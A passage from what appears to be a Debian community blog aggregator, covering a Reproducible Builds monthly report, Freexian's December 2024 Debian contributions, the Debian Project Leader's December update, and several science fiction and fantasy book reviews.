Supply-chain attack in the Solana ecosystem A significant supply-chain attack impacted Solana, an ecosystem for decentralised applications running on a blockchain. Hackers targeted the @solana/web3.js JavaScript library and embedded malicious code that extracted private keys and drained funds from cryptocurrency wallets. According to some reports, about $160,000 worth of assets were stolen, not including SOL tokens and other crypto assets.

Website updates Similar to last month, there was a large number of changes made to our website this month, including:
  • Chris Lamb:
    • Make the landing page hero look nicer when the vertical height component of the viewport is restricted, not just the horizontal width.
    • Rename the Buy-in page to Why Reproducible Builds? [ ]
    • Removing the top black border. [ ][ ]
  • Holger Levsen:
  • hulkoba:
    • Remove the sidebar-type layout and move to a static navigation element. [ ][ ][ ][ ]
    • Create and merge a new Success stories page, which highlights the success stories of Reproducible Builds, showcasing real-world examples of projects shipping with verifiable, reproducible builds. These stories aim to enhance the technical resilience of the initiative by encouraging community involvement and inspiring new contributions. . [ ]
    • Further changes to the homepage. [ ]
    • Remove the translation icon from the navigation bar. [ ]
    • Remove unused CSS styles pertaining to the sidebar. [ ]
    • Add sponsors to the global footer. [ ]
    • Add extra space on large screens on the Who page. [ ]
    • Hide the side navigation on small screens on the Documentation pages. [ ]

Debian changes There were a significant number of reproducibility-related changes within Debian this month, including:
  • Santiago Vila uploaded version 0.11+nmu4 of the dh-buildinfo package. In this release, the dh_buildinfo becomes a no-op ie. it no longer does anything beyond warning the developer that the dh-buildinfo package is now obsolete. In his upload, Santiago wrote that We still want packages to drop their [dependency] on dh-buildinfo, but now they will immediately benefit from this change after a simple rebuild.
  • Holger Levsen filed Debian bug #1091550 requesting a rebuild of a number of packages that were built with a very old version of dpkg.
  • Fay Stegerman contributed to an extensive thread on the debian-devel development mailing list on the topic of Supporting alternative zlib implementations . In particular, Fay wrote about her results experimenting whether zlib-ng produces identical results or not.
  • kpcyrd uploaded a new rust-rebuilderd-worker, rust-derp, rust-in-toto and debian-repro-status to Debian, which passed successfully through the so-called NEW queue.
  • Gioele Barabucci filed a number of bugs against the debrebuild component/script of the devscripts package, including:
    • #1089087: Address a spurious extra subdirectory in the build path.
    • #1089201: Extra zero bytes added to .dynstr when rebuilding CMake projects.
    • #1089088: Some binNMUs have a 1-second offset in some timestamps.
  • Gioele Barabucci also filed a bug against the dh-r package to report that the Recommends and Suggests fields are missing from rebuilt R packages. At the time of writing, this bug has no patch and needs some help to make over 350 binary packages reproducible.
  • Lastly, 8 reviews of Debian packages were added, 11 were updated and 11 were removed this month adding to our knowledge about identified issues.

Other development news In other ecosystem and distribution news:
  • Lastly, in openSUSE, Bernhard M. Wiedemann published another report for the distribution. There, Bernhard reports about the success of building R-B-OS , a partial fork of openSUSE with only 100% bit-reproducible packages. This effort was sponsored by the NLNet NGI0 initiative.

Upstream patches The Reproducible Builds project detects, dissects and attempts to fix as many currently-unreproducible packages as possible. We endeavour to send all of our patches upstream where appropriate. This month, we wrote a large number of such patches, including:

Reproducibility testing framework The Reproducible Builds project operates a comprehensive testing framework running primarily at tests.reproducible-builds.org in order to check packages and other artifacts for reproducibility. In November, a number of changes were made by Holger Levsen, including:
  • reproduce.debian.net-related:
    • Add a new i386.reproduce.debian.net rebuilder. [ ][ ][ ][ ][ ][ ]
    • Make a number of updates to the documentation. [ ][ ][ ][ ][ ]
    • Run i386.reproduce.debian.net run on a public port to allow external workers. [ ]
    • Add a link to the /api/v0/pkgs/list endpoint. [ ]
    • Add support for a statistics page. [ ][ ][ ][ ][ ][ ]
    • Limit build logs to 20 MiB and diffoscope output to 10 MiB. [ ]
    • Improve the frontpage. [ ][ ]
    • Explain that we re testing arch:any and arch:all on the amd64 architecture, but only arch:any on i386. [ ]
  • Misc:
    • Remove code for testing Arch Linux, which has moved to reproduce.archlinux.org. [ ][ ]
    • Don t install dstat on Jenkins nodes anymore as its been removed from Debian trixie. [ ]
    • Prepare the infom08-i386 node to become another rebuilder. [ ]
    • Add debug date output for benchmarking the reproducible_pool_buildinfos.sh script. [ ]
    • Install installation-birthday everywhere. [ ]
    • Temporarily disable automatic updates of pool links on buildinfos.debian.net. [ ]
    • Install Recommends by default on Jenkins nodes. [ ]
    • Rename rebuilder_stats.py to rebuilderd_stats.py. [ ]
    • r.d.n/stats: minor formatting changes. [ ]
    • Install files under /etc/cron.d/ with the correct permissions. [ ]
and Jochen Sprickerhof made the following changes: Lastly, Gioele Barabucci also classified packages affected by 1-second offset issue filed as Debian bug #1089088 [ ][ ][ ][ ], Chris Hofstaedtler updated the URL for Grml s dpkg.selections file [ ], Roland Clobus updated the Jenkins log parser to parse warnings from diffoscope [ ] and Mattia Rizzolo banned a number of bots and crawlers from the service [ ][ ].
If you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. However, you can get in touch with us via:

Freexian Collaborators: Debian Contributions: Tracker.debian.org updates, Salsa CI improvements, Coinstallable build-essential, Python 3.13 transition, Ruby 3.3 transition and more! (by Anupa Ann Joseph, Stefano Rivera)

Debian Contributions: 2024-12 Contributing to Debian is part of Freexian s mission. This article covers the latest achievements of Freexian and their collaborators. All of this is made possible by organizations subscribing to our Long Term Support contracts and consulting services.

Tracker.debian.org updates, by Rapha l Hertzog Profiting from end-of-year vacations, Rapha l prepared for tracker.debian.org to be upgraded to Debian 12 bookworm by getting rid of the remnants of python3-django-jsonfield in the code (it was superseded by a Django-native field). Thanks to Philipp Kern from the Debian System Administrators team, the upgrade happened on December 23rd. Rapha l also improved distro-tracker to better deal with invalid Maintainer fields which recently caused multiples issues in the regular data updates (#1089985, MR 105). While working on this, he filed #1089648 asking dpkg tools to error out early when maintainers make such mistakes. Finally he provided feedback to multiple issues and merge requests (MR 106, issues #21, #76, #77), there seems to be a surge of interest in distro-tracker lately. It would be nice if those new contributors could stick around and help out with the significant backlog of issues (in the Debian BTS, in Salsa).

Salsa CI improvements, by Santiago Ruano Rinc n Given that the Debian buildd network now relies on sbuild using the unshare backend, and that Salsa CI s reproducibility testing needs to be reworked (#399), Santiago resumed the work for moving the build job to use sbuild. There was some related work a few months ago that was focused on sbuild with the schroot and the sudo backends, but those attempts were stalled for different reasons, including discussions around the convenience of the move (#296). However, using sbuild and unshare avoids all of the drawbacks that have been identified so far. Santiago is preparing two merge requests: !568 to introduce a new build image, and !569 that moves all the extract-source related tasks to the build job. As mentioned in the previous reports, this change will make it possible for more projects to use the pipeline to build the packages (See #195). Additional advantages of this change include a more optimal way to test if a package builds twice in a row: instead of actually building it twice, the Salsa CI pipeline will configure sbuild to check if the clean target of debian/rules correctly restores the source tree, saving some CPU cycles by avoiding one build. Also, the images related to Ubuntu won t be needed anymore, since the build job will create chroots for different distributions and vendors from a single common build image. This will save space in the container registry. More changes are to come, especially those related to handling projects that customize the pipeline and make use of the extract-source job.

Coinstallable build-essential, by Helmut Grohne Building on the gcc-for-host work of last December, a notable patch turning build-essential Multi-Arch: same became feasible. Whilst the change is small, its implications and foundations are not. We still install crossbuild-essential-$ARCH for cross building and due to a britney2 limitation, we cannot have it depend on the host s C library. As a result, there are workarounds in place for sbuild and pbuilder. In turning build-essential Multi-Arch: same, we may actually express these dependencies directly as we install build-essential:$ARCH instead. The crossbuild-essential-$ARCH packages will continue to be available as transitional dummy packages.

Python 3.13 transition, by Colin Watson and Stefano Rivera Building on last month s work, Colin, Stefano, and other members of the Debian Python team fixed 3.13 compatibility bugs in many more packages, allowing 3.13 to now be a supported but non-default version in testing. The next stage will be to switch to it as the default version, which will start soon. Stefano did some test-rebuilds of packages that only build for the default Python 3 version, to find issues that will block the transition. The default version transition typically shakes out some more issues in applications that (unlike libraries) only test with the default Python version. Colin also fixed Sphinx 8.0 compatibility issues in many packages, which otherwise threatened to get in the way of this transition.

Ruby 3.3 transition, by Lucas Kanashiro The Debian Ruby team decided to ship Ruby 3.3 in the next Debian release, and Lucas took the lead of the interpreter transition with the assistance of the rest of the team. In order to understand the impact of the new interpreter in the ruby ecosystem, ruby-defaults was uploaded to experimental adding ruby3.3 as an alternative interpreter, and a mass rebuild of reverse dependencies was done here. Initially, a couple of hundred packages were failing to build, after many rounds of rebuilds, adjustments, and many uploads we are down to 30 package build failures, of those, 21 packages were asked to be removed from testing and for the other 9, bugs were filled. All the information to track this transition can be found here. Now, we are waiting for PHP 8.4 to finish to avoid any collision. Once it is done the Ruby 3.3 transition will start in unstable.

Miscellaneous contributions
  • Enrico Zini redesigned the way nm.debian.org stores historical audit logs and personal data backups.
  • Carles Pina submitted a new package (python-firebase-messaging) and prepared updates for python3-ring-doorbell.
  • Carles Pina developed further po-debconf-manager: better state transition, fixed bugs, automated assigning translators and reviewers on edit, updating po header files automatically, fixed bugs, etc.
  • Carles Pina reviewed, submitted and followed up the debconf templates translation (more than 20 packages) and translated some packages (about 5).
  • Santiago continued to work on DebConf 25 organization related tasks, including handling the logo survey and results. Stefano spent time on DebConf 25 too.
  • Santiago continued the exploratory work about linux livepatching with Emmanuel Arias. Santiago and Emmanuel found a challenge since kpatch won t fully support linux in trixie and newer, so they are exploring alternatives such as klp-build.
  • Helmut maintained the /usr-move transition filing bugs in e.g. bubblewrap, e2fsprogs, libvpd-2.2-3, and pam-tmpdir and corresponding on related issues such as kexec-tools and live-build. The removal of the usrmerge package unfortunately broke debootstrap and was quickly reverted. Continued fallout is expected and will continue until trixie is released.
  • Helmut sent patches for 10 cross build failures and worked with Sandro Knau on stuck Qt/KDE patches related to cross building.
  • Helmut continued to maintain rebootstrap removing the need to build gnu-efi in the process.
  • Helmut collaborated with Emanuele Rocca and Jochen Sprickerhof on an interesting adventure in diagnosing why gcc would FTBFS in recent sbuild.
  • Helmut proposed supporting build concurrency limits in coreutils s nproc. As it turns out nproc is not a good place for this functionality.
  • Colin worked with Sandro Tosi and Andrej Shadura to finish resolving the multipart vs. python-multipart name conflict, as mentioned last month.
  • Colin upgraded 48 Python packages to new upstream versions, fixing four CVEs and a number of compatibility bugs with recent Python versions.
  • Colin issued an openssh bookworm update with a number of fixes that had accumulated over the last year, especially fixing GSS-API key exchange which had been quite broken in bookworm.
  • Stefano fixed a minor bug in debian-reimbursements that was disallowing combination PDFs containing JAL tickets, encoded in UTF-16.
  • Stefano uploaded a stable update to PyPy3 in bookworm, catching up with security issues resolved in cPython.
  • Stefano fixed a regression in the eventlet from his Python 3.13 porting patch.
  • Stefano continued discussing a forwarded patch (renaming the sysconfigdata module) with cPython upstream, ending in a decision to drop the patch from Debian. This will need some continued work.
  • Anupa participated in the Debian Publicity team meeting in December, which discussed the team activities done in 2024 and projects for 2025.

3 January 2025

Bits from Debian: Bits from the DPL

Dear Debian community, this is bits from DPL for December. Happy New Year 2025! Wishing everyone health, productivity, and a successful Debian release later in this year. Strict ownership of packages I'm glad my last bits sparked discussions about barriers between packages and contributors, summarized temporarily in some post on the debian-devel list. As one participant aptly put it, we need a way to visibly say, "I'll do the job until someone else steps up". Based on my experience with the Bug of the Day initiative, simplifying the process for engaging with packages would significantly help. Currently we have
  1. NMU The Developers Reference outlines several preconditions for NMUs, explicitly stating, "Fixing cosmetic issues or changing the packaging style in NMUs is discouraged." This makes NMUs unsuitable for addressing package smells. However, I've seen NMUs used for tasks like switching to source format 3.0 or bumping the debhelper compat level. While it's technically possible to file a bug and then address it in an NMU, the process inherently limits the NMUer's flexibility to reduce package smells.
  2. Package Salvaging This is another approach for working on someone else's packages, aligning with the process we often follow in the Bug of the Day initiative. The criteria for selecting packages typically indicate that the maintainer either lacks time to address open bugs, has lost interest, or is generally MIA.
Both options have drawbacks, so I'd welcome continued discussion on criteria for lowering the barriers to moving packages to Salsa and modernizing their packaging. These steps could enhance Debian overall and are generally welcomed by active maintainers. The discussion also highlighted that packages on Salsa are often maintained collaboratively, fostering the team-oriented atmosphere already established in several Debian teams. Salsa Continuous Integration As part of the ongoing discussion about package maintenance, I'm considering the suggestion to switch from the current opt-in model for Salsa CI to an opt-out approach. While I fully agree that human verification is necessary when the pipeline is activated, I believe the current option to enable CI is less visible than it should be. I'd welcome a more straightforward approach to improve access to better testing for what we push to Salsa. Number of packages not on Salsa In my campaign, I stated that I aimed to reduce the number of packages maintained outside Salsa to below 2,000. As of March 28, 2024, the count was 2,368. As of this writing, the count stands at 1,928 [1], so I consider this promise fulfilled. My thanks go out to everyone who contributed to this effort. Moving forward, I'd like to set a more ambitious goal for the remainder of my term and hope we can reduce the number to below 1,800. [1] UDD query: SELECT DISTINCT count(*) FROM sources WHERE release = 'sid' and vcs_url not like '%salsa%' ; Past and future events Talk at MRI Together In early December, I gave a short online talk, primarily focusing on my work with the Debian Med team. I also used my position as DPL to advocate for attracting more users and developers from the scientific research community. FOSSASIA I originally planned to attend FOSDEM this year. However, given the strong Debian presence there and the need for better representation at the FOSSASIA Summit, I decided to prioritize the latter. This aligns with my goal of improving geographic diversity. I also look forward to opportunities for inter-distribution discussions. Debian team sprints Debian Ruby Sprint I approved the budget for the Debian Ruby Sprint, scheduled for January 2025 in Paris. If you're interested in contributing to the Ruby team, whether in person or online, consider reaching out to them. I'm sure any helping hand would be appreciated. Debian Med sprint There will also be a Debian Med sprint in Berlin in mid-February. As usual, you don't need to be an expert in biology or medicine basic bug squashing skills are enough to contribute and enjoy the friendly atmosphere the Debian Med team fosters at their sprints. For those working in biology and medicine, we typically offer packaging support. Anyone interested in spending a weekend focused on impactful scientific work with Debian is warmly invited. Again all the best for 2025
Andreas.

1 January 2025

Russ Allbery: Review: Driving the Deep

Review: Driving the Deep, by Suzanne Palmer
Series: Finder Chronicles #2
Publisher: DAW
Copyright: 2020
ISBN: 0-7564-1512-8
Format: Kindle
Pages: 426
Driving the Deep is science fiction, a sequel to Finder (not to be confused with Finders, Emma Bull's Finder, or the many other books and manga with the same title). It stands alone and you could start reading here, although there will be spoilers for the first book of the series. It's Suzanne Palmer's second novel. When Fergus Ferguson was fifteen, he stole his cousin's motorcycle to escape an abusive home, stashed it in a storage locker, and got the hell off of Earth. Nineteen years later, he's still paying for the storage locker and it's still bothering him that he never returned the motorcycle. His friends in the Shipyard orbiting Pluto convince him to go to Earth and resolve this ghost of his past, once and for all. Nothing for Fergus is ever that simple. When the key he's been carrying all these years fails to open the storage unit, he hacks it open, only to find no sign of his cousin's motorcycle. Instead, the unit is full of expensive storage crates containing paintings by artists like Van Gogh. They're obviously stolen. Presumably the paintings also explain the irate retired police officer who knocks him out and tries to arrest him, slightly after the urgent message from the Shipyard AI telling him his friends are under attack. Fergus does not stay arrested, a development that will not surprise readers of the previous book. He does end up with an obsessed and increasingly angry ex-cop named Zacker as an unwanted passenger. Fergus reluctantly cuts a deal with Zacker: assist him in finding out what happened to his friends, and Fergus will then go back to Earth and help track down the art thieves who shot Zacker's daughter. It will be some time before they get back to Earth. Fergus's friends have been abducted by skilled professionals. What faint clues he can track down point to Enceladus, a moon of Saturn with a vast subsurface ocean. One simulation test with a desperate and untrustworthy employer later, Fergus is now a newly-hired pilot of an underwater hauler. The trend in recent SFF genre novels has been towards big feelings and character-centric stories. Sometimes this comes in the form of found family, sometimes as melodrama, and often now as romance. I am in general a fan of this trend, particularly as a corrective to the endless engineer-with-a-wrench stories, wooden protagonists, and cardboard characters that plagued classic science fiction. But sometimes I want to read a twisty and intelligent plot navigated by a competent but understated protagonist and built around nifty science fiction ideas. That is exactly what Driving the Deep is, and I suspect this series is going to become my go-to recommendation for people who "just want a science fiction novel." I don't want to overstate this. Fergus is not a blank slate; he gets the benefit of the dramatic improvement in writing standards and characterization in SFF over the past thirty years. He's still struggling with what happened to him in Finder, and the ending of this book is rather emotional. But the overall plot structure is more like a thriller or a detective novel: there are places to go, people to investigate, bases to infiltrate, and captives to find, so the amount of time spent on emotional processing is necessarily limited. Fergus's emotions and characterization are grace notes around the edges of the plot, not its center. I thoroughly enjoyed this. Palmer has a light but effective touch with characterization and populates the story with interesting and distinguishable characters. The plot has a layered complexity that allows Fergus to keep making forward progress without running out of twists or getting repetitive. The motivations of the villains were not the most original, but they didn't need to be; the fun of the story is figuring out who the villains are and watching Fergus get out of impossible situations with the help of new friends. Finder was a solid first novel, but I thought Driving the Deep was a substantial improvement in both pacing and plot coherence. If I say a novel is standard science fiction, that sounds like criticism of lack of originality, but sometimes standard science fiction is exactly what I want to read. Not every book needs to do something wildly original or upend my understanding of story. I started reading science fiction because I loved tense adventures on moons of Saturn with intelligent spaceships and neat bits of technology, and they're even better with polished writing, quietly competent characterization, and an understated sense of humor. This is great stuff, and there are two more books already published that I'm now looking forward to. Highly recommended when you just want a science fiction novel. Followed by The Scavenger Door. Rating: 8 out of 10

31 December 2024

Chris Lamb: Favourites of 2024

Here are my favourite books and movies that I read and watched throughout 2024. It wasn't quite the stellar year for books as previous years: few of those books that make you want to recommend and/or buy them for all your friends. In subconscious compensation, perhaps, I reread a few classics (e.g. True Grit, Solaris), and I'm almost finished my second read of War and Peace.

Books

Elif Batuman: Either/Or (2022) Stella Gibbons: Cold Comfort Farm (1932) Michel Faber: Under The Skin (2000) Wallace Stegner: Crossing to Safety (1987) Gustave Flaubert: Madame Bovary (1857) Rachel Cusk: Outline (2014) Sara Gran: The Book of the Most Precious Substance (2022) Anonymous: The Railway Traveller s Handy Book (1862) Natalie Hodges: Uncommon Measure: A Journey Through Music, Performance, and the Science of Time (2022)Gary K. Wolf: Who Censored Roger Rabbit? (1981)

Films Recent releases

Seen at a 2023 festival. Disappointments this year included Blitz (Steve McQueen), Love Lies Bleeding (Rose Glass), The Room Next Door (Pedro Almod var) and Emilia P rez (Jacques Audiard), whilst the worst new film this year was likely The Substance (Coralie Fargeat), followed by Megalopolis (Francis Ford Coppola), Unfrosted (Jerry Seinfeld) and Joker: Folie Deux (Todd Phillips).
Older releases ie. Films released before 2023, and not including rewatches from previous years. Distinctly unenjoyable watches included The Island of Dr. Moreau (John Frankenheimer, 1996), Southland Tales (Richard Kelly, 2006), Any Given Sunday (Oliver Stone, 1999) & The Hairdresser s Husband (Patrice Leconte, 19990). On the other hand, unforgettable cinema experiences this year included big-screen rewatches of Solaris (Andrei Tarkovsky, 1972), Blade Runner (Ridley Scott, 1982), Apocalypse Now (Francis Ford Coppola, 1979) and Die Hard (John McTiernan, 1988).

30 December 2024

Russ Allbery: Review: House in Hiding

Review: House in Hiding, by Jenny Schwartz
Series: Uncertain Sanctuary #2
Publisher: Jenny Schwartz
Copyright: October 2020
Printing: September 2024
ASIN: B0DBX6GP8Z
Format: Kindle
Pages: 196
House in Hiding is the second book of a self-published space fantasy trilogy that started with The House That Walked Between Worlds. I read it as part of the Uncertain Sanctuary omnibus, which is reflected in the sidebar metadata. At the end of the previous book, Kira had gathered a motley crew for her house and discovered that she had drawn the attention of some rather significant galactic powers. Now, with the help of her new (hopefully) friends, she has to decide what role she's going to play in the galaxy. Or she can dither a lot, ruminate repeatedly on the same topics, and flail about randomly. That's also an option. This is slightly unfair. By the second half of the book, the series plot is beginning to cohere around two major problems: what is happening to the magic flows in the universe, and who killed Kira's parents. But apparently there was a limit on my enjoyment for the chaos in Kira's chaotic decisiveness I praised in my review of the last book, and I hit that limit around the middle of this book. I am interested in the questions of ethics, responsibility, and public image that this series is raising. I'm just not convinced that Schwartz is going to provide satisfying answers. One thing I do appreciate about this book is that it acknowledges that politics exist and that taking powerful people at face value is a bad idea. You would think that this would be a low bar, and yet it's depressing how many fantasy novels signal the trustworthiness of a character via some variation of "I looked into his eyes and shook his hand," or at least expect readers to be surprised by the inevitable betrayals. Schwartz does not make that mistake; after getting a call from a powerful player in galactic politics, the characters take apart everything that was said while assuming it could be attempted manipulation, which is the correct initial response. My problem comes after that. I like reading about competent characters with a plan, and these are absurdly powerful but very naive characters with no plan. This is realistic for the situation Kira has been thrust into, but it's not that entertaining to read about. I think the root of my problem is that there are some fundamental storytelling problems here that Schwartz is struggling to fix. The basic theory of story says that you need a protagonist, a setting, a conflict, and a plot. Schwartz has a good protagonist, one great supporting character and several adequate ones, and an enjoyably weird setting. I think she's working her way up to having a plot, although usually it's best for the plot to show up before the middle book of the series. What she doesn't have is a meaningful conflict. It's not entirely clear to either the reader or to Kira why Kira cares about what's happening. You would not think this would be a problem given that Kira's parents were murdered before the start of the first book. That's a classic conflict that's driven more books than I think anyone could count. It's not what Kira has cared about up to this point, however; she got away from Earth and has shown no sign of wanting to go back or identify the people who killed her parents, perhaps because she mostly blames herself. Instead, she's stumbling across other problems in the universe that other people would like her to care about. She occasionally feels like she ought to care about them because they involve her new friends or because she wants to be a good person, but they have very little dramatic oomph. "I'm a sorcerer and vaguely want the universe to be a better place" turns out to not work that well as a source of dramatic tension. This lack of conflict is somewhat fascinating because it's so different than most fantasy novels. If Schwartz were more aware of how oddly disconnected her protagonist is from the story conflict, I think there could be a thoughtful, if odd, psychological novel in here about one's ethical responsibilities if one suddenly had vast power and no strong attachments to the world. Kira does gesture occasionally in that direction, but there's no real meat to her musings. Instead, her lack of motivation is solved through one of the hoariest tropes in fiction: children in danger. I really want to like this series, and I still love the House, but this book was not good. The romance that I was delighted to not be subjected to in the first book appears to be starting (sigh), the political maneuvering that happens here is only mildly interesting and not believably competent, and the book concludes in Kira making an egregiously and blatantly stupid mistake that should have resulted in one of her friends asking her what the hell she was doing. Some setup happens, and it seems likely that the final book will have a clear conflict and plot, but this middle book was a disappointing mess. These books are fast to read and lightly entertaining between other things, and the House still has me invested enough in this universe that I'll read the last book in the omnibus. Be warned, though, that the middle book is more a collection of anecdotes than a story, and there's only so much of Kira showing off her power I can take without a conflict and a plot. Followed by The House That Fought. Rating: 5 out of 10

29 December 2024

Russ Allbery: Review: The Last Hour Between Worlds

Review: The Last Hour Between Worlds, by Melissa Caruso
Series: The Echo Archives #1
Publisher: Orbit
Copyright: November 2024
ISBN: 0-316-30364-X
Format: Kindle
Pages: 388
The Last Hour Between Worlds is urban, somewhat political high fantasy with strong fae vibes. It is the first book of a series, but it stands alone quite well. Kembral Thorne is a Hound, a member of the guild that serves as guards, investigators, and protectors. Kembral's specialty is Echo retrieval: rescues of people and animals who have fallen through a weak spot in reality into one of the strange, dangerous, and malleable layers called Echoes. Kem once rescued a dog from six layers down, an almost unheard-of feat. Kem is also a new single mother, which means her past two months have been spent in a sleep-deprived haze revolving exclusively around her much-beloved infant. Dona Marjorie Swift's year-turning party is the first time she's been out without Emmi since she gave birth, and she's only there because her sister took the child and practically shoved her out the door. Now, she's desperately trying to remember how to be social and normal, which is not made easier by the unexpected presence of Rika at the party. Rika Nonesuch is not a Hound. She's a Cat, a member of the guild of thieves and occasional assassins. They are the nemesis of the Hounds, but in a stylized and formalized way in which certain courtesies are expected. (The politics of this don't really make sense; you just have to go with it.) Kem has complicated feelings about Rika's grace, banter, and intoxicating perfume, feelings that she thought might be reciprocated until Rika drugged her during an apparent date and left her buried under a pile of garbage. She was not expecting Rika to be at this party and is definitely not ready to have a conversation with her. This emotional turmoil is rudely interrupted by the death of nearly everyone at the party via an Echo poison, the appearance of a dark figure driving a black sword into someone, and the descent of the entire party into an Echo. This was one of those books that kept getting better the farther into the book I read. I was a bit leery at first because the publisher's blurb made it sound more like horror than I prefer, but this is more the disturbing strangeness of fae creatures than the sort of gruesomeness, disgust, or body horror that I find off-putting. Most importantly, the point of this book is not to torture the characters or scare the reader. It's instead structured a bit like a murder mystery, but one whose resolution requires working out obscure fantasy rules and hidden political agendas. One of the currencies in the world of Echos is blood, but another is emotion, revelation, and the stories that bring both, and Caruso focuses the story more on that aspect than on horrifying imagery.
Rika frowned. "Resolve it? How?" "I have no idea." I couldn't keep my frustration from leaking through. "Might be that we have to delve deep into our own hearts to confront the unhealed wounds we've carried with us in secret. Might be that we have to say their names backward, or just close our eyes and they'll go away. Echoes never make any damned sense." Rika made a face. "We'd better not have to confront our unhealed wounds, or I'm leaving you to die."
All of The Last Hour Between Worlds is told in the first person from Kem's perspective, but Rika is the best character in this book. Kem is a rather straightforward, dogged, stubborn protector; Rika is complicated, selfish, conflicted, and considerably more dynamic. The first obvious twist in her background I spotted so long before Kem found out that it was a bit frustrating, but there were multiple satisfying twists after that. As advertised in the blurb, there's a sapphic romance angle here, but it's the sort that comes from a complicated friendship and a lot of mutual respect rather than love at first sight. Some of their relationship conflict is driven by misunderstanding, but the misunderstanding happens before the novel begins, which means the reader doesn't have to sit through the bit where one yells at the characters for being stupid. It helps that the characters have something concrete to do, and that driving plot problem is multi-layered and satisfying. Each time the party falls through a layer of reality, it's mostly reset to the start of the book, but the word "mostly" is hiding a lot of subtlety. Given the clock at the start of each chapter and the blurb (if one read it), the reader can make a good guess that the plot problem will not be fully resolved until the characters fall quite deep into the Echoes, but the story never felt repetitive the way that some time loop stories can. As the characters gain more understanding, the problems change, the players change, and they have to make several excursions into the surrounding world. This is the sort of fantasy that feels a bit like science fiction. You're thrown into a world with a different culture and different rules that are foreign to the reader and natural to the characters. Part of the fun of reading is figuring out the rules, history, and backstory while watching the characters try to solve the puzzles they're faced with. The writing is good but not great. Characterization was good enough for a story primarily focused on action and puzzle-solving, but it was a bit lacking in subtlety. I think Caruso's strengths showed most in the world design, particularly the magic system and the rules followed by the Echo creatures. The excursions outside of the somewhat-protected house struck a balance between eeriness and comprehensibility that reminded me of T. Kingfisher or Sandman. The human politics were unfortunately less successful and rested on some tired centrist cliches. Thankfully, this was not the main point of the story. I should also warn that there is a lot of talk about babies. Kem's entire identity at the start of the novel, to the point of incessant monologue, is "new mother." This is not a perspective we get very often in fantasy, and Kem eventually finds a steadier balance between her bond with her daughter and the other parts of her life. I think some readers will feel very seen. But Caruso leans hard into maternal bonding. So hard. If you don't want to read about someone who is deliriously obsessed with their new child, you may want to skip this one. Right after I finished this book, I thought it was amazing. Now that I've had a few days to think about it, the lack of subtlety and the facile human politics brought it down a notch. I'm a science fiction reader at heart, so I loved the slow revelation of mechanics; the reader starts the story by knowing that Kem can "blink step" but not knowing what that means, and by the end of the story one not only knows but has opinions about its limitations, political implications, and interactions with other forms of magic. The Echo worlds are treated similarly, and this type of world-building is my jam. But the cost is that the human characters, particularly the supporting cast, don't get the same focus and therefore are a bit straightforward and obvious. The subplot with Dona Vandelle was particularly annoying. Ah well. Kem and Rika's relationship did work, and it's the center of the book. If you like fantasy mechanics but are a bit leery of fae stories because they feel too symbolic or arbitrary, give this a try. It's the most satisfyingly constructed fae story that I've read in a long time. It's not great literary fiction, but it's also not trying to be; it's a puzzle adventure, and a well-executed one. Recommended, and I will definitely be reading the sequel. Content notes: Lots of violent death and other physical damage, creepy dream worlds with implied but not explicit horror, and rather a lot of blood. Followed by The Last Soul Among Wolves, not yet published at the time I wrote this review. Rating: 8 out of 10

23 December 2024

Russ Allbery: Review: The House That Walked Between Worlds

Review: The House That Walked Between Worlds, by Jenny Schwartz
Series: Uncertain Sanctuary #1
Publisher: Jenny Schwartz
Copyright: June 2020
Printing: September 2024
ASIN: B0DBX6GP8Z
Format: Kindle
Pages: 215
The House That Walked Between Worlds is the first book of a self-published trilogy of... hm. Space fantasy? Pure fantasy with a bit of science fiction thrown in for flavor? Something like that. I read it as part of the Uncertain Sanctuary omnibus, which is reflected in the sidebar metadata. Kira Aist is a doctor. She's also a witch and a direct descendant of Baba Yaga. Her Russian grandmother warned her to never use magic and never reveal who she was because people would hunt her and her family if she did. She broke the rule to try to save a child, her grandmother was right, and now multiple people are dead, including her parents. As the story opens, she's deep in the wilds of New Zealand in a valley with buried moa bones, summoning her House so that she can flee Earth. Kira's first surprise is that her House is not the small hut that she was expecting from childhood visits to Baba Yaga. It's larger. A lot larger: an obsidian castle with nine towers and legs that resemble dragons rather than the moas whose magic she drew on. Her magic apparently had a much different idea of what she needs than she did. Her second surprise is that her magical education is highly incomplete, and she is not the witch that she thought she was. Her ability to create a House means that she's a sorcerer, the top tier of magical power in a hierarchy about which she knows essentially nothing. Thankfully the House has a library, but Kira has a lot to learn about the universe and her place in it. I picked this up because the premise sounded a little like the Innkeeper novels, and since another novel in that series does not appear to be immediately forthcoming, I went looking elsewhere for my cozy sentient building fix. The House That Walked Between Worlds is nowhere near as well-written (or, frankly, coherent) as the Innkeeper books, but it did deliver some of the same vibes. You should know going in that there isn't much in the way of a plot. Schwartz invented an elaborate setting involving archetype worlds inhabited by classes of mythological creatures that in some mystical sense surround a central system called Qaysar. These archetype worlds spawn derived worlds, each of which seems to be its own dimension, although the details are a bit murky to me. The world Kira thinks of as Earth is just one of the universes branched off of an archetypal Earth, and is the only one of those branchings where the main population is human. The other Earth-derived worlds are populated by the Dinosaurians and the Neanderthals. Similarly, there is a Fae world that branches into Elves and Goblins, an Epic world that branches into Shifters, Trolls, and Kobolds, and so forth. Travel between these worlds is normally by slow World Walker Caravans, but Houses break the rules of interdimensional travel in ways that no one entirely understands. If your eyes are already starting to glaze over, be warned there's a lot of this. The House That Walked Between Worlds is infodumping mixed with vibes, and I think you have to enjoy the setting, or at least the sheer enthusiasm of Schwartz's presentation of it, to get along with this book. The rest of the story is essentially Kira picking up strays: first a dangerous-looking elf cyborg, then a juvenile giant cat (because of course there's a pet fantasy space cat; it's that sort of book), and then a charming martial artist who I'm fairly sure is up to no good. Kira is entirely out of her depth and acting on instinct, which luckily plays into stereotypes of sorcerers as mysterious and unpredictable. It also helps that her magic is roughly "anything she wants to happen, happens." This is, in other words, not a tightly-crafted story with coherent rules and a sense of risk and danger. It's a book that succeeds or fails almost entirely on how much you like the main characters and enjoy the world-building. Thankfully, I thought the characters were fun, if not (so far) all that deep. Kira deals with her trauma without being excessively angsty and leans into her new situation with a chaotic decisiveness that I found charming. The cyborg elf is taciturn and a bit inscrutable at first, but he grew on me, and thankfully this book does not go immediately to romance. Late in the book, Kira picks up a publicity expert, which was not at all the type of character that I was expecting and which I found delightful. Most importantly, the House was exactly what I was looking for: impish, protective, mysterious, inhuman, and absurdly overpowered. I adore cozy sentient building stories, so I'm an easy audience for this sort of thing, but I'm already eager to read more about the House. This is not great writing by any stretch, and you will be unsurprised that it's self-published. If you're expecting the polish and plot coherence of the 